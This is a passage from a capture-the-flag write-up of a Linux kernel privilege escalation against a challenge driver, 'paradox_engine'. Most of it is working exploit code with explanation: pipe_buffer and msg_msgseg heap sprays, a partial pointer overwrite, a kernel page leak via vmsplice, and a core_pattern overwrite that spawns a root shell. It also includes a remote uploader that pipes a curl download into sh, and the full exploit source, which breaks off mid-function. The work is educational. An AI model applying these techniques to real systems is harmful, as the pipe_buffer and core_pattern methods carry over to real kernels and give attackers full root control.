Notice that the victim object is from 0xffff888006494bd0 - 0xffff888006494c3f while the post-alloc object is from 0xffff888006494c40 - 0xffff888006494caf

Furthermore, note that the victim's refcount is at 0xbfffffff meaning it has underflowed, and its causal_dependency pointer is pointing to itself at 0xffff888006494bd0 .

✍️ Another important note is that all the objects are spaced 0x70 = 112 bytes apart. This is a highly abnormal size which was made possible by the use of the dedicated slab cache. In practice, it is very difficult for us to find exploitable kernel objects of this exact size. Ideally we would want the object to have the same size as other objects in the kmalloc- or kmalloc-cg- caches.

⚠️ If we tried to reclaim the page by spraying objects of a different size, and accidentally overwrite the causal_dependency pointer with an invalid non-null value, when the paradox_engine_release dereferences the pointer in the loop, the kernel would crash!

🧠 If we just overwrite causal_dependency with NULL, the loop simply terminates, and we don't use the infinite loop to kfree anything else. We basically "waste" the vulnerability.

👀 Ideally, we want to reclaim it with something that we can control so that we can control what we kfree next! If we overwrite the refcount to 1, and overwrite causal_dependency to something that can be kfreed, we will have a double allocation! But the problem with this is that we don't have any leaks 😢, so we don't know what to overwrite it with either!

💡 The eureka moment

I spent quite a few days spraying different objects to find out what could be a possible solution. As I was playing with pipe_buffer, I realised that very often the page storing the buffer's data would reclaim the victim page, and the data I write into the pipe would overwrite the bytes in the victim page. When we write into this page, we can overwrite the causal_weight refcount, followed by the temporal_event * .

This got me wondering: Is it possible that writing into this pipe could allow partial overwrites? What if instead of overwriting all 8 bytes of the temporal_event * I could just overwrite 1, or 2, or 3? 🤔

It turns out, you can!

Now let's think about what we can do with this in mind:

  • Spray pipe_buffer , one of their pages will reclaim the victim page

  • Since the refcount is always +0x8-bytes aligned, first write 0x10 bytes into each pipe. Then read those 0x10 bytes to see if the last 8 bytes had changed, for example from \x00\x00\x00\x00\x00\x00\x00\x01 to \x00\x00\x00\x00\xc0\x00\x00\x00 or to \x00\x00\x00\x00\xbf\xff\xff\xff . If they did change, then we know that the victim object is at offset +0x000 within the victim page, and we will also know which pipe holds the victim page.

    • Otherwise if the victim object is not at offset +0x000, we repeat the previous step, but this time writing 0x20 bytes and reading 0x20 bytes. We repeat this until we find the offset of the victim object within the victim page, and we know which pipe holds the victim page.

In doing these, we have found the pipe holding the victim page and the offset of the victim object within the victim page, and we also haven't touched the temporal_event * pointer. That's great!

Now the question is: What do we do with our partial overwrite primitive on the temporal_event *? To answer this question, I took a quick look at the pages in the page allocator using the buddy-dump command to see if there was anything useful. Note that at this point, my temporal_event * was 0xffff888006494bd0.

I saw this:

What is "order"?

The buddy allocator maintains blocks of free pages where each block is a power of two number of pages. The exponent for the power of two sized block is referred to as the order. If your order is 3 for example, that means that the block has 232^3 pages.

View this page for more info.

This is great for two reasons:

  1. If I overwrite the least significant 3 bytes of temporal_event * to \x60\x00\x00 I would be able to get this exact address

  2. This pattern is consistent across reboots! Let's see another run:

Self-referring event at 0xffff88800654ea80, order 9 unmovable page at 0xffff888006600000 :

👍 So if we do something like this:

  • Spray an object X to reclaim the order-9 page

  • Partial overwrite temporal_event * to trigger kfree on its address

  • Spray another object Y to reclaim the page again,

We could achieve an overlap between objects X and Y! Wonderful!

Part 3. Spraying enlarged pipe_buffers to claim the order-9 page

Now I was once again on the hunt for a new object. It had to be relatively large so that I could get it to use the order-9 page within a reasonable time, and also

⚠️ Ideally at offset +0x10 it should have NULL. Why? Look at temporal_event and the infinite loop again:

struct temporal_event {
	u64 event_id; // +0x0
	refcount_t causal_weight; // +0x8
	struct temporal_event *causal_dependency; // +0x10
	char description[64]; // +0x18
	struct list_head timeline_node; // +0x58
	struct timeline *parent_timeline; // +0x68
};
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
// paradox_engine_release snippet
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}

In the first round of the loop, after we set refcount = 1 and do the partial overwrite, next_in_chain would be our page address. This then becomes cause.

In the second round of the loop, next_in_chain would be whatever is at page+0x10 .

If page+0x10 is not null, the third round of the loop would do cause->causal_dependency (which is actually (*cause).causal_dependency ) and dereference the value at page+0x10 .

We also have a third requirement: Whatever is at offset +0x8 of the page overlaps with what the program thinks is the temporal_event's refcount, so we should be able to set this to one if we actually want the reclaiming object to get freed using event_put.

📜 To summarise what we need of object X:

  • Relatively large

  • Value at +0x10 is (hopefully) null

  • Value at +0x8 == 1

I was once again stuck at this point for several days. And then I saw the light. How? By again playing with pipe_buffer. Let's look closely at this bad boy, shall we?

Note that pipe_buffer structs don't exist in isolation; rather, they are allocated as a consecutive array of pipe buffers. In fact, there is another struct called pipe_inode_info which points to a ring of pipe_buffers in its pipe_inode_info.buf field.

🟢 pipe_buffer actually satisfies the "relatively large" requirement since we can enlarge the array via the function fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) which changes the pipe ring size. (Here n should be a power of 2 according to this).

🟢 pipe_buffer also satisfies the third requirement since we can control the value of pipe_buffer->offset by reading from it.

struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  // size of a pipe_buffer is 0x28

At first glance, it seems useless as it literally has a pointer at offset +0x10. If we simply create a pipe_buffer object in our page then trigger the vulnerability, we would get cooked as *ops gets dereferenced and we get a crash somewhere down the line.

👼 But here's our saving grace: When a pipe_buffer gets released, its ops field actually gets nulled! This is fantastic for us, since we can simply allocate then release the first pipe_buffer in the ring to null out whatever is at offset +0x10! We are still free to use the rest of the pipe_buffers in the page for exploitation.

There's a catch, however: a non-privileged user has a limit to the max pipe_buffer size they can allocate, and this can be checked in /proc/sys/fs/pipe-max-size:

~ $ cat /proc/sys/fs/pipe-max-size
1048576 = 0x1000 * 0x100

After spraying a bit (and praying), I found that spraying just 50 of these max-sized pipes was sufficient to consistently claim the order-9 page.

So for this step, basically just spray 50 of these max-sized pipes, and write and read 1 byte from each of them to trigger their release, which will NULL out the ops pointer. Simultaneously, writing and reading 1 byte from it causes pipe_buffer->offset = 1 which allows the page to be freed when event_put is called on the page!

Here's the code for this part:

#define PIPE_BUF_SPRAY1 50

int pfds[PIPE_BUF_SPRAY1][2];
char* filler1 = malloc(0x1000);
memset(filler1, 'A', 0x1000);
int res;
// stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    res = pipe(pfds[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers\n" );
        return -1;
    }
    // enlarge
    // we can spray at most around 60 of these before we get cooked
    res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
    if (res < 0) {
        printf("fcntl %d failed!\n", i );
        return -1;
    }
    // write into bufs[0]
    res = write(pfds[i][1], filler1, 1);
    if (res < 0) {
        printf("write failed!\n" );
        return -1;
    }
}
for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
    // set the first pipe_buf's op field to NULL
    // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
    read(pfds[i][0], filler1, 1);
}

Part 4. Trigger vuln

As discussed previously, overwrite the victim object, setting its refcount to 1 and overwriting the least significant 3 bytes to \x60\x00\x00. This should cause the page claimed in the previous step to now be freed!

To do so, free the victim pipe whose id we now know, and spray pipe_buffer again.

The issue here was that freeing this victim pipe sometimes caused the page to go into CPU 1's partial list, which I did not have control of. This could have been due to some balancing of cpu partial lists. To deal with this issue, I create some dummy pipe_buffers by calling pipe then writing into each pipe, and closed them before closing the victim pipe.

This reclamation is only successful slightly less than 50% of the time, and it's where my exploit loses the bulk of its consistency.

Code:

// need to spray enough to push the victim pipe into free_area instead of cpu1 ?
int dummy_pipes[DUMMY_PIPES][2];
for (int i = 0; i < DUMMY_PIPES; i++) {
    int res = pipe(dummy_pipes[i]);
    if (res < 0) {
        printf("Failed to create pipe %d\n", i);
        break;
    }
}
for (int i = 0; i < DUMMY_PIPES; i++) {
    res = write(dummy_pipes[i][1], "a", 1);
    if (res < 0) {
        printf("Failed to write to pipe %d\n", i);
        break;
    }
    close(dummy_pipes[i][1]);
    close(dummy_pipes[i][0]);
}
close(pipe_fds[changed_pipe][1]);
close(pipe_fds[changed_pipe][0]);
usleep(1000);
// getchar();
char* buf = malloc(cursize + 3);
memset(buf, '\x00', cursize + 3);
buf[cursize - 0x8] = '\x01'; // refcount
// buf[cursize + 2] = '\xa0';
buf[cursize + 2] = '\x60';
// spray more pipe_buffer for the partial overwrite
int stage_2_pipes[PIPE_BUF_SPRAY2][2];
for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
    // printf("i: %d\n", i);
    int res = pipe(stage_2_pipes[i]);
    if (res < 0) {
        printf("Failed to allocate pipe buffers %d\n", i);
        break;
    } 
    ret = write(stage_2_pipes[i][1], buf, cursize + 3);
    if (ret < 0) {
        printf("[x] Write!\n");
        break;
    }
}

Part 5. Overlapping objects X and Y

Now we need to choose an object Y which will overlap with our array of pipe_buffers . Note that as the vuln triggers a kfree in CPU 1 (as our infinite loop occurred in CPU 1), this part has to be done in CPU 1. I achieved this by creating a thread and pinning it to CPU 1.

Note that our object here should claim a page of order \leq 2 because the re-released page is of order 2:

The ideal candidate here, of course, would be msg_msgseg since we pretty much get arbitrary read + write over the entire struct, and we can modify its size by controlling the size of the data we send using msgsnd. As we can freely modify its size, we can also control the order of the page it reclaims.

Background on System V IPC

Function Signatures:

int msgget(key_t key, int msgflg);
ssize_t msgrcv(size_t msgsz;
                      int msqid, void msgp[msgsz], size_t msgsz, long msgtyp,
                      int msgflg);
int msgsnd(size_t msgsz;
                      int msqid, const void msgp[msgsz], size_t msgsz,
                      int msgflg);

Sending messages via System V IPC first needs you to create a message queue as follows:

int qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);

Then using the queue id, you can send a message as such:

struct msgbuf {
            long mtype;
            char mtext[0x1000-0x30-0x8+0x400];
};
msgbuf* msg = malloc(sizeof(msgbuf));
msg->mtype = 6;
int ret = msgsnd(qid, msg, sizeof(msg->mtext), 0);
if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
}

and receive them as such:

msgrcv(msqid, leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);

Note: In msgrcv, you can specify IPC_NOWAIT | MSG_COPY if you don't want the underlying msg_msg or msg_msgseg structs to be freed when the message is received

Note: Specifying the message's mtype when sending and receiving messages allows you to specify which message you want. If your msgrcv mtype is 0, you just get the first message in the queue.

What is msg_msgseg?

First, understand that the size of a msg_msg struct is 0x30, and the rest of the struct is the transmitted data. If the data sent exceeds (0x1000 - 0x30) = 0xfd0 bytes, the remaining data is transmitted in a msg_msgseg struct. msg_msgseg struct has an 8-byte pointer, and user data comes after.

undefined struct msg_msg {
	struct list_head m_list; +0x0
	long m_type; +0x10
	size_t m_ts;  +0x18
	struct msg_msgseg *next; +0x20
	void *security; +0x28
	/* the actual message follows immediately */
};

msg_msgseg {
	msg_msgseg* next;
 	/* content afterwards */
}

I went ahead with a 0x400-sized msg_msgseg spray, and my msg_msgseg goes into kmalloc-cg-1k. When we do slub-dump kmalloc-cg-1k in gef, we can clearly see that the page order is 2, because num pages: 4. Therefore it is a good size to choose to maximise the chance of msg_msgseg reclaiming the page!

Here's my code for this segment:

#define NUM_MSGMSG 250
int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
        }
    }
}
int main(){ 
...
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
...
}

Part 6. vmsplice syscall

Now that we have overlapping msg_msgseg and pipe_buffer structs, we need to think of how to get LPE.

One option was getting a text leak from pipe_buffer->ops , then replacing it with a stack pivot gadget and doing kROP. But this won't work since SMAP and SMEP are enabled.

After some research, I came across this exploit which had a similar msg_msgseg and pipe_buffer overlap.

What is vdso?

Wikipedia: vDSO (virtual dynamic shared object) is a kernel mechanism for exporting a carefully selected set of kernel space routines to user space applications so that applications can call these kernel space routines in-process, without incurring the performance penalty of a mode switch from user mode to kernel mode that is inherent when calling these same kernel space routines by means of the system call interface.

While vDSO is provided by the kernel, it resides within the user-space portion of a process's virtual address space.

By doing something like this:

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})
// get vDSO addr
// https://man7.org/linux/man-pages/man3/getauxval.3.html
size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
struct iovec iov = {vvar, 1};
// vmsplice vDSO to the pipe, it will spill struct page of kernel text to the pipe
SYSCHK(vmsplice(mypipe[1], &iov, 1, 0));

We cause pipe_buffer->page to refer to the page struct corresponding to vDSO. That is, a page responsible for kernel text.

🤔 Why is this helpful?

With a leaked page* pointer from the pipe_buffer, we can change it to be the page responsible for any region of kernel text! We'll see why this is useful later.

Part 7. Leaking page* of kernel text

To recap what we've done, we:

  1. Sprayed msg_msgseg into the first 0x400 bytes of the page to reclaim the order 2 page

  2. Overwrote some of the msg_msgseg (to be specific the second chunk of 0x28 bytes) using the spliced pipe_buffer, whose page * is responsible for vDSO

Now if we read from msg_msgseg we can get the page * leak! (Note: the ops * leak isn't really necessary)

int victim_msqid = -1;

struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
leakmsg->mtype = 6;
memset(leakmsg, 0, sizeof(struct leakmsgbuf));
char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
struct pipe_buffer *p;
for (int i = 0; i < NUM_MSGMSG; i++) {
    // read msg without freeing memory
    ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
    if (ret < 0) {
        perror("msgrcv"); 
        continue;
    }
    if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
        msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
        victim_msqid = ms_qids[i];
        printf("[+] Victim found! msqid: %d\n", victim_msqid);
        // print victim data
        for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
            printf("%02x ", leakmsg->mtext[i]);
        }
        printf("\n");
        p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
        break;
    }
}
/*
no kaslr leaks : 
- page leak: 0xffffea00000cf400
- pipe_buf_ops leak: 0xffffffff82c6fe80

kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

    struct pipe_buffer {
        void *page;
        unsigned int offset, len;
        void *ops;
        unsigned int flags;
        unsigned long private;
    };
*/
if (victim_msqid == -1) {
    printf("Victim msqid not found!\n");
    return -1;
}
void *page_leak;
memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
void *pipe_buf_ops_leak;
memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
printf("page leak: %p\n", page_leak);
printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);

Part 8 + 9. Overwriting the second pipe

Now what can we do with the page * leak? Well, there happens to be a region of kernel text called the core_pattern, which basically tells the kernel what to do when there's a crash.

In the linux kernel documentation /usr/src/linux/Documentation/sysctl/kernel.txt.

[/proc/sys/kernel/]core_pattern is used to specify a core dumpfile pattern name.

  • If the first character of the pattern is a '|', the kernel will treat the rest of the pattern as a command to run. The core dump will be written to the standard input of that program instead of to a file.

In other words, overwriting the core_pattern with something starting with '|' results in whatever comes after as a command which will be run in kernel mode!

But the question now is: Sure, we know the address of the page * pointing to vDSO, but how do we know the address of the page * responsible for core_pattern? It turns out that the offset between them is constant. By calculating the offset between the vDSO and core_pattern virtual addresses we can also calculate the offset between their respective page * structs!

In my case, I found:

// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60

The difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000. For every 0x1000 byte page, there is a 64 byte struct page* stored in vmemmap, so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6

Looking at the pre-overwritten pipe_buffer:

struct pipe_buffer {
  struct page * page; +0x0
  unsigned int offset; +0x8
  unsigned int len; +0xc
  const struct pipe_buf_operations * ops; +0x10
  unsigned int flags; +0x18
  unsigned long private; +0x20
};  
  
  0xffff888006600000|+0x0000|+000: 0x0000000000000000 <- start of bufs[0] pipe_buffer
  0xffff888006600008|+0x0008|+001: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600010|+0x0010|+002: 0x6161616161616161 'aaaaaaaaaaaaaaaaaaaaaaaa'
  0xffff888006600018|+0x0018|+003: 0x6161616161616161 'aaaaaaaaaaaaaaaa'
  0xffff888006600020|+0x0020|+004: 0x6161616161616161 'aaaaaaaa'
  0xffff888006600028|+0x0028|+005: 0xffffea00000cf400  ->  0x008c000000002204 <- start of bufs[1] pipe_buffer and the page leak!
  0xffff888006600030|+0x0030|+006: 0x0000000100000000
  0xffff888006600038|+0x0038|+007: 0xffffffff82c6fe80 <user_page_pipe_buf_ops>  ->  0x0000000000000000
  0xffff888006600040|+0x0040|+008: 0x0000000000000000
  0xffff888006600048|+0x0048|+009: 0x0000000000000000
  0xffff888006600050|+0x0050|+010: 0x6161616161616161

the len = 1 already. By leaving the len untouched and setting pipe_buffer->offset = 0xa60 - 1 we can change the entire content of core_pattern! We also need to add the PIPE_BUF_FLAG_CAN_MERGE flag to pipe_buffer->flags to allow every pipe write to also write to the physical page.

Here's the code for this part:

// modify struct page that will represent of `core_pattern`'s page
// p->page was originally pointing vdso_image_64.data.
// gef> p (void*)vdso_image_64
// $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
// gef> p &core_pattern
// $1 = (<data variable, no debug info> *) 0xffffffff83808a60
// gef> p 0xffffffff83808a60-0xffffffff833d0000
// $3 = 0x438a60
// the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
// every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
// so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6
// (right shift by 12 bits and left shift by 6 bits)
p->page += (0x438000 >> 6);
// Since p->len == 1, we need to subtract one on p->offset
p->offset = 0xa60 - 1;
p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
leakmsg->mtype = 7;
// overwrite the pipe_buffer with msg_msgseg (with our own modified pipe_buffer content)
int payload_msqids[0x100];
for (int i = 0; i < 0x100; i++) {
    payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}
for (int i = 0; i < 0x100; i++) {
    ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
    if (ret < 0) {
        printf("[x] msgsnd %d!\n", i);
        return -1;
    }
}

Part 10. Setting up the command + executing it for root shell

We still need to decide what to write into the core_pattern which will give us LPE when a crash is triggered. I used the same method as this exploit, which was to overwrite it with |/proc/%P/fd/666 %P\n. Doing so causes the kernel to execute whatever process is on the crashing process' FD 666, passing the PID as an argument.

Then consider the following main:

int cfd[2];
char* dummybuf = "abcd";

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int main(int argc, char **argv) {
        // if it called from triggerred crash from core pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
        // this code is "activated" when core_pattern has been overwritten and triggers a crash
        setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}
        // ...
        // end of main
        for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        	dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    	}
    	printf("[+] Stage 7 done!\n");
    	// show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    	// getchar();
    
    	write(cfd[1], dummybuf, 1);
    	while (1) {
        	sleep(100);
    	}

    	return 0;
}

The child process:

  • Creates an in-memory file and copies the program's ELF image into it

  • Moves it to fd 666, so it is reachable at /proc/CHILD-PID/fd/666

  • Waits for the parent's signal that the exploit is finished by doing read(cfd[0], dummybuf, 1)

When write(cfd[1], dummybuf, 1) is executed, the parent signals to the child it is done.

The child then triggers a crash by dereferencing NULL, causing the code which we wrote into core_pattern to be executed. This causes the executable at /proc/CHILD-PID/fd/666 to be executed with an argument, giving us a root shell and reading the flag.

Compiling and sending the exploit to remote

According to ptr-yudai's blog post, it usually works fine if you use musl-gcc to compile your exploit code (with the effect of making the binary much smaller), and sending it to remote as base64. However, for some reason my exploit wasn't working once I used musl-gcc to compile it. The third LSB to overwrite in the partial-overwrite stage had changed. The exploit worked once I changed that.

I also used the following uploader.py (generated by ChatGPT) to automate the PoW solving, sending of base64 and decoding it to the binary:

#!/usr/bin/env python3
from pwn import *
import base64
import subprocess
import re

def solve_pow(pow_command):
    """Solve the proof of work challenge"""
    log.info(f"Solving PoW: {pow_command}")
    try:
        result = subprocess.run(pow_command, shell=True, capture_output=True, text=True, timeout=30)
        if result.returncode == 0:
            solution = result.stdout.strip()
            log.success(f"PoW solution: {solution}")
            return solution
        else:
            log.error(f"PoW failed: {result.stderr}")
            return None
    except Exception as e:
        log.error(f"PoW error: {e}")
        return None

def run(io, cmd):
    io.sendlineafter(b"$ ", cmd.encode())
    io.recvline()

def main():
    # Configuration
    USE_REMOTE = True  # Set to True for remote
    HOST = "159.223.33.156"
    PORT = 9102
    
    # Read exploit binary
    with open("./test", "rb") as f:
        payload = base64.b64encode(f.read()).decode('ascii')
    
    # Connect
    if USE_REMOTE:
        io = remote(HOST, PORT)
        
        # Handle PoW if present
        try:
            initial = io.recvuntil(b"solution:", timeout=5).decode()
            pow_match = re.search(r'curl -sSfL https://pwn\.red/pow \| sh -s ([^\s]+)', initial)
            if pow_match:
                challenge = pow_match.group(1)
                pow_command = f"curl -sSfL https://pwn.red/pow | sh -s {challenge}"
                solution = solve_pow(pow_command)
                if solution:
                    io.sendline(solution.encode())
                else:
                    log.error("Failed to solve PoW")
                    return
        except EOFError:
            pass  # No PoW challenge
    else:
        io = process("./run.sh")
    
    # Upload exploit
    run(io, 'cd /tmp')
    
    log.info("Uploading exploit...")
    for i in range(0, len(payload), 512):
        progress = f"{i//512 + 1}/{(len(payload) + 511)//512}"
        log.info(f"Uploading chunk {progress}")
        run(io, f'echo "{payload[i:i+512]}" >> b64exp')
    
    log.info("Setting up exploit...")
    run(io, 'base64 -d b64exp > exploit')
    run(io, 'rm b64exp')
    run(io, 'chmod +x exploit')
    
    log.success("Exploit uploaded!")
    io.interactive()

if __name__ == "__main__":
    main()

Afterthoughts

Although I spent a really long time on this challenge, on hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the linux kernel's allocators and numerous linux kernel exploit techniques.

Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! 😄

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/auxv.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <semaphore.h>
// #include <linux/msg.h>

#define DEVICE_PATH "/dev/paradox_engine"
#define N_PAGESPRAY                0x200
// Define the size of a cred structure (adjust based on your kernel)
#define CRED_SIZE 168
// Number of children to spawn (cred spray)
#define NUM_CHILDREN 200

// Number of temporal_events to spray
#define NUM_SPRAY 200
#define FORK_SPRAY 320
#define NUM_PIPES 25
#define PIPE_BUF_SIZE 0x64
#define NUM_TASKS 50
#define CRED_JAR_INITIAL_SPRAY 200

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

// ioctl commands and structures
#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

#define PIPE_BUF_SPRAY1 50
#define DUMMY_PIPES 300
#define PIPE_BUF_SPRAY2 50
// original 250
#define NUM_MSGMSG 250

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})

struct paradox_timeline_req {
    uint64_t cause_timeline_id, cause_event_id;
    uint64_t new_timeline_id;
};

struct paradox_event_req {
    uint64_t target_timeline_id;
    uint64_t cause_event_id;
    char description[64];
    uint64_t new_event_id;
};

typedef struct {
    int thread_id;
    int num_events;
} thread_arg;

struct pipe_buffer
{
	void *page;
	unsigned int offset, len;
	void *ops;
	unsigned int flags;
	unsigned long private;
};

// https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}

void errExit(char * msg)
{
    printf("\033[31m\033[1m[x] Error : \033[0m%s\n",msg);
    exit(-1);
}

static void die(const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    fputc('\n', stderr);
    exit(1);
}

static uint64_t dev_create_timeline(int fd, uint64_t cause_timeline_id, uint64_t cause_event_id) {
    struct paradox_timeline_req req;
    memset(&req, 0, sizeof(req));
    req.cause_timeline_id = cause_timeline_id;
    req.cause_event_id = cause_event_id;
    if (ioctl(fd, PARADOX_CREATE_TIMELINE, &req) != 0) die("ioctl CREATE_TIMELINE failed: %s", strerror(errno));
    return req.new_timeline_id;
}

static uint64_t dev_create_event(int fd, uint64_t tlid, uint64_t cause_eid, const char *desc) {
    struct paradox_event_req req;
    memset(&req, 0, sizeof(req));
    req.target_timeline_id = tlid;
    req.cause_event_id = cause_eid;
    snprintf(req.description, sizeof(req.description), "%s", desc ? desc : "e");
    if (ioctl(fd, PARADOX_CREATE_EVENT, &req) != 0) die("ioctl CREATE_EVENT failed: %s", strerror(errno));
    return req.new_event_id;
}

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}


#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120
int fd1, fd2, fd3, fd4, fd5;
sem_t ready;

void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}

void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
